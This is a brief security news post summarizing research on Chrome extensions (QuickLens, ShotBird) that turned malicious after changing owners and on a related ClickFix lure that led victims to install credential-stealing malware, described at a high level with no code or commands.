Recent security research has identified a concerning trend of legitimate Google Chrome extensions, such as QuickLens and ShotBird, turning malicious following ownership transfers. These extensions, which previously held "Featured" status on the Chrome Web Store, were updated with capabilities to strip security headers and bypass Content Security Policy (CSP) protections. By utilizing remote command-and-control (C2) servers to deliver JavaScript payloads at runtime, the attackers avoid static analysis detection, enabling them to fingerprint users and execute arbitrary code on every page load.
Beyond browser-level manipulation, the campaign employs "ClickFix" lures to facilitate host-level compromise. Victims are presented with fraudulent browser update prompts that trick them into executing PowerShell commands, ultimately installing malware designed to siphon credentials, payment information, and sensitive browser data. This shift from browser-based abuse to full endpoint compromise underscores the significant supply chain risks associated with third-party extensions in both corporate and personal environments.
Top comments (0)